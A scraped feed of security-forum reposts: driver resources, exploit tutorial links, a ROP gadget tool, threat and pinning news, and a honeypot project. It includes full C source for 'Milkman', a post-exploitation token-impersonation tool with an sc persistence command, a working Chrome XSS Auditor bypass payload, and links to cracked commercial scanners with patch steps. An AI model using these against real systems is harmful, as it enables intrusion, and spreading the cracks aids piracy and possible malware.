The first and most important resource about Windows Driver Development is OSROnline: OSR Online - The Home Page for Windows Driver Developers I strongly suggest you subscribe to: 1. The NT Insider 2. NTDEV MailingList 3. NTFSD MailingList NDIS Developer's Reference NDIS Developer's Reference Information, Articles, and Free Downloads Resources The Undocumented Functions NTAPI Undocumented Functions Blog MSDN driver writing != bus driving - Site Home - MSDN Blogs Windows Vista Kernel Structures Windows Vista Kernel Structures Peter Wieland's thoughts on Windows driver development Pointless Blathering - Site Home - MSDN Blogs USB Driver Development Microsoft Windows USB Core Team Blog - Site Home - MSDN Blogs Hardware and Driver Developer Blogs Support and community for Windows hardware developers Developer Newsgroups • microsoft.public.development.device.drivers • microsoft.public.win32.programmer.kernel • microsoft.public.windbg KernelmodeInfo Blog CURRENT_IRQL j00ru//vx tech blog Coding, reverse engineering, OS internals Blog j00ru//vx tech blog Nynaeve Nynaeve DumpAnalysis Blog Software Diagnostics Institute | Structural and Behavioral Patterns for Software Diagnostics, Forensics and Prognostics. Software Diagnostics Library.
Analyze -v Blog http://analyze-v.com/ Instant Online Crash Dump Analysis Instant Online Crash Analysis Winsock Kernel (WSK) Winsock Kernel (Windows Drivers) Transport Driver Interface (TDI) _ Network Driver Interface Specification (NDIS) The NDIS blog - Site Home - MSDN Blogs System Internals System Internals (Windows Drivers)

Driver development needs a lot of time, patience and experience to be fully understood; in my opinion the best approach remains LbD ( Learning by Doing ), so read, study and develop: the more experience you build, the fewer BSODs and "strange behaviors" you will encounter.

See you at the next post,
Giuseppe 'Evilcry' Bonfa

Sursa: KernelMode.info • View topic - Device Driver Development for Beginners - Reloaded
-
Packet Storm Security Linux Exploit Writing

Linux Exploit Writing Tutorial Part 1
Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows.

Linux Exploit Writing Tutorial Part 2
Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1.

Linux Exploit Writing Tutorial Part 3
Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc.

Linux Exploit Development Part 2 Rev 2
Linux Exploit Writing Tutorial Part 3 Rev 2

Code:
Linux Exploit Writing Tutorial Part 1 ? Packet Storm
Linux Exploit Writing Tutorial Part 2 ? Packet Storm
Linux Exploit Development Part 2 Rev 2 ? Packet Storm
Linux Exploit Writing Tutorial Part 3 ? Packet Storm
Linux Exploit Writing Tutorial Part 3 Revision 2 ? Packet Storm

Sursa: EXETOOLS FORUM
-
We're not Apple hipsters. Well, only @aelius is.
-
Latest Firefox version adds protection against rogue SSL certificates
Nytro replied to Nytro's topic in Stiri securitate
It's good, man. SSL pinning = hardcoded RootCA/Server certificate. That means it prevents Man in the Middle even with a RootCA installed locally (on a phone or computer). -
[h=1]Ropper – rop gadget finder and binary information tool [/h] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags. usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase] [-c] [-s] [-S] [--imports] [--symbols] [--set <option>] [--unset <option>] [-I <imagebase>] [-p] [-j <reg>] [--depth <n bytes>] [--search <regex>] [--filter <regex>] [--opcode <opcode>] [--type <type>] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. supported filetypes: ELF PE supported architectures: x86 x86_64 MIPS optional arguments: -h, --help show this help message and exit -v, --version Print version --console Starts interactive commandline -f <file>, --file <file> The file to load -i, --info Shows file header [ELF/PE] -e Shows EntryPoint --imagebase Shows ImageBase [ELF/PE] -c, --dllcharacteristics Shows DllCharacteristics [PE] -s, --sections Shows file sections [ELF/PE] -S, --segments Shows file segments [ELF] --imports Shows imports [ELF/PE] --symbols Shows symbols [ELF] --set <option> Sets options. Available options: aslr nx --unset <option> Unsets options. Available options: aslr nx -I <imagebase> Uses this imagebase for gadgets -p, --ppr Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64] -j <reg>, --jmp <reg> Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64] --depth <n bytes> Specifies the depth of search (default: 10) --search <regex> Searches for gadgets --filter <regex> Filters gadgets --opcode <opcode> Searches for opcodes --type <type> Sets the type of gadgets [rop, jop, all] (default: all) example uses: [Generic] ropper.py ropper.py --file /bin/ls --console [Informations] ropper.py --file /bin/ls --info ropper.py --file /bin/ls --imports ropper.py --file /bin/ls --sections ropper.py --file /bin/ls --segments ropper.py --file /bin/ls --set nx ropper.py --file /bin/ls --unset nx [Gadgets] ropper.py --file /bin/ls --depth 5 ropper.py --file /bin/ls --search "sub eax" ropper.py --file /bin/ls --filter "sub eax" ropper.py --file /bin/ls --opcode ffe4 ropper.py --file /bin/ls --type jop ropper.py --file /bin/ls --ppr ropper.py --file /bin/ls --jmp esp,eax ropper.py --file /bin/ls --type jop [h=2]Download[/h] https://github.com/sashs/Ropper (v1.0.1, 01.09.2014) Sursa: Ropper - rop gadget finder and binary information tool
-
The Chinese Underground In 2013 2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher) The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves. How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups. The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy. First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the ID of the senders, we also believe that the number of participants has also doubled in the same period. Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions. Our latest paper in the Cybercrime Underground Economy Series titled The Chinese Underground In 2013 contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground. Sursa: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro
-
Latest Firefox version adds protection against rogue SSL certificates Firefox 32 has implemented a feature known as certificate key pinning By Jeremy Kirk | IDG News Service Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services. The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Security Layer) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic. The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat. Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google. In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued. The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki. Sursa: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld
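As a rough illustration of the idea described in the article above (this is not Mozilla's implementation, and the pin set and hash values below are made up), key pinning boils down to shipping a set of acceptable public-key hashes per host and only accepting an otherwise-valid chain if at least one certificate in it matches a pin:

# Toy illustration of certificate key pinning; hashes and host names are placeholders.
import hashlib

PINS = {
    "example.org": {"a7f3deadbeef..."},    # known-good SPKI hashes shipped with the client
}

def spki_hash(der_public_key_bytes):
    return hashlib.sha256(der_public_key_bytes).hexdigest()

def chain_is_pinned(host, chain_public_keys):
    pins = PINS.get(host)
    if pins is None:
        return True                        # host not pinned: fall back to normal CA validation
    # accept only if some certificate in the verified chain matches a known-good pin
    return any(spki_hash(key) in pins for key in chain_public_keys)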
-
Milkman: Creating Processes as Any Currently Logged in User

One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What's the problem with that? Isn't SYSTEM god mode? Ya, and normally I'd agree that it's the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn't get any proxy settings. Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up.

Along comes RunAsCurrentUser-2.0.3.1.exe

I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post. Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe

This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it's created by a legitimate company for legitimate reasons? w00tw00t. Game on! Only two problems:

It is 335K, which doesn't seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session.
It takes an argument which normally isn't a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn't something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy.

So I set out to try and figure out how this binary did its magic. As I'm not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at its insides (plus, double check to see if it was being detected as malicious at all). As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn't quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you "Milkman": https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below)

This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service:

C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto
[SC] CreateService SUCCESS

It will start up every time the computer starts, which is completely useless, since there won't be any users logged in at that point, but you get where this can go. Features to add to this at some point are:

Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful.
Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in.
Finally, the obvious one is to change it so that it is not always calc.exe that it runs, by accepting another argument or some other kind of config option.

Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below.

#ifndef UNICODE
#define UNICODE
#endif

#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <Psapi.h>

void perror(DWORD nStatus)
{
    LPVOID lpMsgBuf;
    FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL, nStatus, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL);
    wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf);
    if (lpMsgBuf) {
        LocalFree(lpMsgBuf);
    }
}

int str_ends_with(TCHAR * str, TCHAR * suffix)
{
    if (str == NULL || suffix == NULL) {
        return 0;
    }
    size_t str_len = wcslen(str);
    size_t suffix_len = wcslen(suffix);
    if (suffix_len > str_len) {
        return 0;
    }
    return 0 == wcscmp(str + str_len - suffix_len, suffix);
}

int start_process(int PID)
{
    TCHAR cmd[512] = TEXT("calc.exe");
    STARTUPINFO startup_info;
    PROCESS_INFORMATION process_information;
    SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation;
    LPVOID pEnvironment;
    HANDLE hProc = NULL;
    HANDLE hToken = NULL;
    HANDLE hTokenDup = NULL;

    ZeroMemory(&startup_info, sizeof(startup_info));
    startup_info.cb = sizeof(startup_info);
    ZeroMemory(&process_information, sizeof(process_information));
    ZeroMemory(&pEnvironment, sizeof(pEnvironment));

    hProc = OpenProcess(GENERIC_ALL, FALSE, PID);
    //perror(GetLastError());
    OpenProcessToken(hProc, GENERIC_ALL, &hToken);
    //perror(GetLastError());
    ImpersonateLoggedOnUser(hToken);
    //perror(GetLastError());
    DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup);
    //perror(GetLastError());
    CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information);
    //perror(GetLastError());
    return 0;
}

int find(TCHAR *name)
{
    //wprintf(TEXT("Looking for %s\n"), name);
    DWORD aProcesses[1024], cbNeeded, cProcesses;
    unsigned int i;
    HANDLE hProcessEnum;
    TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");

    if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) {
        return 1;
    }
    cProcesses = cbNeeded / sizeof(DWORD);
    for (i = 0; i < cProcesses; i++) {
        if (aProcesses[i] != 0) {
            hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]);
            if (NULL != hProcessEnum) {
                GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
                if (str_ends_with(szProcessName, name)) {
                    //wprintf(TEXT("[+] %d -\t%s\n"), aProcesses[i], szProcessName);
                    start_process(aProcesses[i]);
                }
            }
        }
    }
    return 0;
}

int wmain(int argc, TCHAR * argv[])
{
    if (argc > 1 && argv[1]) {
        find(argv[1]);
        //perror(GetLastError());
    } else {
        find(TEXT("explorer.exe"));
        //perror(GetLastError());
    }
    return 0;
}

Posted by mubix Aug 14th, 2014

Sursa: Milkman: Creating processes as any currently logged in user - Room362.com
-
Google Chrome 31.0 XSS Auditor Bypass Authored by Rafay Baloch Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. #Vulnerability: Google Chrome 31.0 XSS Auditor Bypass #Impact: Moderate #Authors: Rafay Baloch #Company: RHAInfoSec #Website: http://rhainfosec.com <http://rhainfose.com/> #version: Latest Description Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. Proof Of concept: Consider the following code: <html> <body> <script type="text/javascript"> document.write(location.hash); </script> </body> </html> This takes input from location.hash property and writes it to the DOM. We initially inject the following payload: #<img src=x onerror=prompt(1)>. The request is blocked and the following error is returned: " The XSS Auditor refused to execute a script in 'attacker.com#><img src=x onerror=prompt(1)>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header." However, the following vector passes by: #<img src=x onerror=prompt(1)// The following is how its reflected inside of DOM: <img src="x" onerror="prompt(1)//" <="" body=""> Sursa: Google Chrome 31.0 XSS Auditor Bypass ? Packet Storm
-
[h=2]Bifrozt - A high interaction honeypot solution for Linux based systems.[/h]Tue, 09/02/2014 - 12:34 — are.hansen A few days ago I was contacted by our CPRO, Leon van der Eijk, and asked to write a blog post about my own project called Bifrozt; something which I was more than happy to do. This post will explain what Bifrozt is, how this got started, the overall status of the project and what will happen further down the road. What is Bifrozt? Generally speaking, Bifrozt is a NAT device with a DHCP server that is usually deployed with one NIC connected directly to the Internet and one NIC connected to the internal network. What differentiates Bifrozt from other standard NAT devices is its ability to work as a transparent SSHv2 proxy between an attacker and your honeypot. If you deployed a SSH server on Bifrozt's internal network it would log all the interaction to a TTY file in plain text that could be viewed later and capture a copy of any files that were downloaded. You would not have to install any additional software, compile any kernel modules or use a specific version or type of operating system on the internal SSH server for this to work. It will limit outbound traffic to a set number of ports and will start to drop outbound packets on these ports when certain limits are exceeded. How it started. Bifrozt is not something I can take full credit for, it depends on a awesome python project by Thomas Nicholson which I discovered in February 2014. Thomas had coded a SSH proxy called HonSSH and had taken inspiration and utilized code from the medium interaction Kippo honeypot. After I discovered HonSSH I decided to build an ISO file, that would allow me to install a pre-configured NAT device with HonSSH, on either a hardware or virtualized machine. I thought this would be a suitable project that I could occupy myself with during a 2 week holiday. Six months later and the project is still very much alive. Current status. Me and Thomas have been co-operating over the last five months to align our projects as much possible. Developing Bifrozt is much like building a car. Thomas is developing the engine (HonSSH) and making sure it's running smoothly, whilst I am developing the strong and solid frame (firewall, data extraction from log files, data control, system configuration etc etc) around it. Bifrozt has been in a proof of concept stage (Alpha) for the last six months. The current version, 0.0.8, has a relative humble feature list, but this is about to change. Bifrozt 0.0.8 -------------- - Intercept downloaded files - Logs all SSH communications to plain text file and TTY logs - Enforces data control - Facilitates data capture - Provides high level integrity of the captured data - Hardware installation - Virtual installation - Honeyd is pre-installed - Easy data extraction from logs - Disrupts outbound SYN flood attacks from the honeypot - Disrupts outbound UDP flood attacks from the honeypot - Compatible with amd64 architecture After after a few weeks of summer vacation I've started planning and testing the next release of Bifrozt. 
Bifrozt 0.0.9
--------------
- Compatible with x86 architecture
- IDS (Snort or Suricata)
- Viewing alerts and statistics through a browser
- Complete overhaul of the Python code
- Multiple installation options to better suit the hardware resources and needs of the end user
- Expand the current toolbox
- Change base system from Ubuntu to Debian (no final decision has been made about this yet)
- Tool to generate DROP rules based on country of origin
- Update and add more functions to bifrozt_stats (log data extraction)

Roadmap for the future.

No one knows what is going to happen down the road, but at the present time neither Thomas nor I plan on abandoning our projects any time soon. We have both decided to create a roadmap for the future, and he has allowed me to share his here, together with mine.

Bifrozt roadmap.
-------------------
Short term goals (Alpha stage):

System:
- Offline installation
- Desktop environment (install option)
- Optimizing IDS
- Expand/improve web stats (optimize current, add HonSSH, create a dedicated start page)
- HP feeds data sharing
- Optimize firewall and data control

Tools:
- Simple static malware analysis (add VirusTotal upload function)
- System re-configuration tool(s) (DHCP, SSH, firewall and so on)
- Develop new tools or adjust current ones to complement additional data captured by HonSSH

Long term goals (Beta stage and beyond):
- Provide a NAT device that delivers reliable data capture of the most commonly used protocols
- Quickly display data about the attacks, malware and outbound communication in an easily understandable format
- To the extent of my abilities, make sure the project continues to be based on open source and freely available to anyone

HonSSH roadmap.
---------------------
Short term:
- Bring HonSSH out of proof-of-concept code into a more logical production format
- Implement a bot-to-owner correlation technique using random passwords
- Bug bashing

Longer term:
- Output data to ElasticSearch
- Allow HTTP tunneling (currently disabled), parse HTTP outputs etc.
- Parse X11 sessions (not sure if this will be worth it or not)
- More consideration on data analysis (might be a separate project)

HonSSH's current aim:
- Parse, interpret and log all communications that travel through an SSH tunnel. Currently supports Terminal, Exec (and SCP) and SFTP traffic.

HonSSH's current challenges:
- Parsing the terminal: knowing what is a command and what is program input (e.g. nano).

HonSSH's current questions:
- Should HonSSH act on commands? For example, when a wget command is detected, should it pull down the file (active), or should we use/develop another tool for passive packet capture/MITM of HTTP and IRC?

Links: Bifrozt | HonSSH

Source: https://www.honeynet.org/node/1191
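As a rough, conceptual illustration of the data control behaviour described above (outbound traffic limited to a set number of ports, with packets dropped once certain limits are exceeded), here is a minimal Python sketch. This is not Bifrozt's actual code; the interface name, allowed ports and rate limit are assumptions made purely for illustration.

#!/usr/bin/env python3
# Conceptual sketch of Bifrozt-style outbound data control (NOT Bifrozt's own code).
# The interface name, allowed ports and rate limit below are illustrative assumptions.
import subprocess

HONEYNET_IF = "eth1"               # assumed internal, honeypot-facing interface
ALLOWED_TCP_PORTS = [22, 80, 443]  # assumed set of permitted outbound ports
RATE_LIMIT = "20/minute"           # assumed packet budget per allowed port

def iptables(*rule):
    """Print and apply a single iptables rule (requires root)."""
    cmd = ["iptables"] + list(rule)
    print(" ".join(cmd))
    subprocess.run(cmd, check=True)

for port in ALLOWED_TCP_PORTS:
    # Forward outbound packets on an allowed port while under the rate limit...
    iptables("-A", "FORWARD", "-i", HONEYNET_IF, "-p", "tcp",
             "--dport", str(port), "-m", "limit", "--limit", RATE_LIMIT,
             "-j", "ACCEPT")
    # ...and drop further packets on that port once the limit is exceeded.
    iptables("-A", "FORWARD", "-i", HONEYNET_IF, "-p", "tcp",
             "--dport", str(port), "-j", "DROP")

# Anything else leaving the honeynet on a port that is not explicitly allowed is dropped.
iptables("-A", "FORWARD", "-i", HONEYNET_IF, "-j", "DROP")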
-
RiskTool.Patcher
HackTool[CrackTool:not-a-virus]/Win32.Patcher
Win32:Patcher-AK [PUP]
Riskware/GamePatcher
PUA.HackTool.Patcher

Most of them identify it as a "Patcher". It is fairly normal for it to be detected, since it is a keygen.
-
Here is Netsparker 3.5.3.

I have not tried it and I do not know whether it is infected; run it at your own risk.

Download: Download Crack rar

I highly recommend that you download the trial versions of the apps from the official websites, test the cracks/patches, and only then apply them to those installations.

Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
WebInspect 10.20: download the application from the official site itself.

I have not tried it and I do not know whether it is infected; run it at your own risk.

Download: https://download.hpsmartupdate.com/webinspect/

Crack: hp webinspect crack.rar — RGhost — file sharing

To crack it, copy WI8.exe and HPLicense.xml into the installation folder, double-click WI8.exe, click on License first and browse to HPLicense.xml, then click on Patch. Enjoy; the license will be valid until 2020.

Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
You can download the trial version of AppScan from their site by registering and downloading the evaluation version. Otherwise, you can download it from here.

I have not tried it and I do not know whether it is infected; run it at your own risk.

Download: ??? ??-qinxiaopeng456???

Download APPS_STD_EDI_9.0_WIN_ML_EVA.exe and LicenseProvider.dll, install AppScan, and then replace LicenseProvider.dll in the installation directory.

Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
Audit Your Website Security with Acunetix Web Vulnerability Scanner

As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases.

I have not tried it and I do not know whether it is infected; run it at your own risk.

Download (cracked): Download Web Vul Scanner tar

Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138